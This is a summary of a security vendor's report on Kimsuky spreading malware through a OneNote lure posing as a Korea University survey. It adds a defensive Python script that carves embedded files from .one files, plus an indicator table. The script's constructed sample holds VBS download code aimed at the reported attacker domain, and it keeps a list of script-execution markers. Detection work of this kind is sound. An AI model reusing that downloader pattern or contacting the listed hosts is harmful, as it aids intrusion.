Kimsuky group appears to be exploiting OneNote like the cybercrime group

2023-03-17 S2W

https://medium.com/s2wblog/kimsuky-group-appears-to-be-exploiting-onenote-like-the-cybercrime-group-3c96b0b85b9f


S2W reported that Kimsuky distributed malware through a malicious Microsoft OneNote file, a delivery technique that until then had been seen mostly in cybercrime campaigns. The lure impersonated Korea University’s Institute for Peace and Democracy and asked survey participants to open what appeared to be a privacy-agreement form (an HWP file) required to receive their participation fee; clicking the embedded object instead executed hidden VBS. The script attempted to download a decoy HWP and additional code from delps.scienceontheweb.net, using a list.php?query=1 URL pattern and hosting infrastructure previously associated with Kimsuky’s Babyshark activity. The final payload was not recovered, but the recompense theme, the URL format, and the 185.176.43[.]98 infrastructure support the report’s attribution to Kimsuky.
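The delivery chain above (OneNote file, embedded object, hidden VBS, list.php?query=N download URL) is the part a defender can check for without the final payload. The script below is an added example, not code from S2W or from the report: it carves every embedded file object out of a .one blob, flags ones that look like script, and pulls out download URLs matching the reported pattern and the reported host. It assumes the FileDataStoreObject layout from Microsoft's MS-ONESTORE specification (header GUID, 8-byte length, 12 bytes of unused/reserved fields, then the file data, then a footer GUID), and the sample OneNote file and VBS it runs on are constructed here; the URL path in the sample is an assumption, since the real URLs are truncated in the IOC table.

```python
import re
import struct
import uuid

# FileDataStoreObject header/footer GUIDs and the .one file-type GUID, as documented in
# MS-ONESTORE (assumption: taken from the spec, not from the S2W report; verify before use).
FDSO_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FDSO_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
ONE_FILE_TYPE = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le

# Download-URL shape described in the report (list.php?query=N) and the reported hosts.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?/[^\s'\"<>]*list\.php\?query=\d+")
REPORTED_HOSTS = {"delps.scienceontheweb.net", "185.176.43.98"}

# Cheap markers of script content that has no business inside a note page.
SCRIPT_MARKERS = (b"createobject(", b"wscript.", b"shell.application", b"<script", b"powershell")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # CFB container magic (HWP 5.x decoys are CFB)


def carve_embedded_files(data: bytes) -> list[bytes]:
    """Return the FileData bytes of every FileDataStoreObject in a OneNote blob.

    Assumed layout: guidHeader(16) | cbLength u64 LE (8) | unused(4) | reserved(8) |
    FileData(cbLength) | padding | guidFooter(16). Only cbLength is trusted for the walk.
    """
    payloads = []
    pos = 0
    while (idx := data.find(FDSO_HEADER, pos)) != -1:
        if idx + 24 > len(data):
            break                                    # header cut off: nothing to read
        (length,) = struct.unpack_from("<Q", data, idx + 16)
        body = idx + 36                              # GUID + cbLength + unused + reserved
        if body + length > len(data):
            break                                    # truncated/corrupt object: stop, don't over-read
        payloads.append(data[body:body + length])
        pos = body + length
    return payloads


def classify_payload(blob: bytes) -> str:
    """Rough type label used for triage; 'script' is the one that matters for this lure."""
    if blob.startswith(OLE_MAGIC):
        return "cfb"            # OLE/CFB container, e.g. the decoy HWP
    if blob.startswith(b"MZ"):
        return "pe"
    lowered = blob.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return "script"
    return "other"


def triage_onenote(data: bytes) -> dict:
    """Summarise embedded objects, script payloads and reported-pattern URLs in a .one file."""
    report = {"embedded": 0, "scripts": 0, "urls": [], "reported_host_hit": False}
    for blob in carve_embedded_files(data):
        report["embedded"] += 1
        if classify_payload(blob) == "script":
            report["scripts"] += 1
        for match in URL_RE.findall(blob):
            url = match.decode("ascii", "replace")
            report["urls"].append(url)
            host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]
            if host in REPORTED_HOSTS:
                report["reported_host_hit"] = True
    return report


# --- constructed sample (not a real Kimsuky file) ---------------------------------------

def build_fdso(file_data: bytes) -> bytes:
    """Wrap bytes in a FileDataStoreObject so the example can run offline."""
    pad = (-len(file_data)) % 8
    return (FDSO_HEADER + struct.pack("<Q", len(file_data)) + b"\x00" * 12
            + file_data + b"\x00" * pad + FDSO_FOOTER)

SAMPLE_VBS = (                                       # constructed; path is an assumption
    b'Set sh = CreateObject("WScript.Shell")\r\n'
    b'url = "http://delps.scienceontheweb.net/list.php?query=1"\r\n'
    b'Set xh = CreateObject("MSXML2.XMLHTTP")\r\n'
    b'xh.Open "GET", url, False\r\n'
)
SAMPLE_HWP = OLE_MAGIC + b"\x00" * 24                # header-only stand-in for the decoy HWP
SAMPLE_ONE = (ONE_FILE_TYPE + b"\x00" * 64
              + build_fdso(SAMPLE_VBS) + b"\x00" * 16 + build_fdso(SAMPLE_HWP))

if __name__ == "__main__":
    print(triage_onenote(SAMPLE_ONE))
```

Run it against a real .one file by reading the bytes and passing them to `triage_onenote`; a hit on `scripts` plus a URL on a reported host is enough to quarantine the message, and the carved blobs can be hashed and compared with the IOC table. The carver stops at a truncated object instead of trusting a length that runs past the end of the file, which is the usual way such parsers get tripped.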

Indicators of Compromise

Type    Value                              First Seen   Last Seen
DOMAIN  delps.scienceontheweb.net          2023-03-17   2024-12-16
IPv4    185.176.43.98                      2020-09-04   2024-12-16
HASH    aa756b20170aa0869d6f5d5b5f1b7c37   2023-03-17   2023-05-24
HASH    f2a0e92b80928830704a00c91df87644   2023-03-17   2023-05-24
URL     http://delps.scienceontheweb.ne…   2023-03-17   2023-03-20
URL     http://delps.scienceontheweb.ne…   2023-03-17   2023-03-20
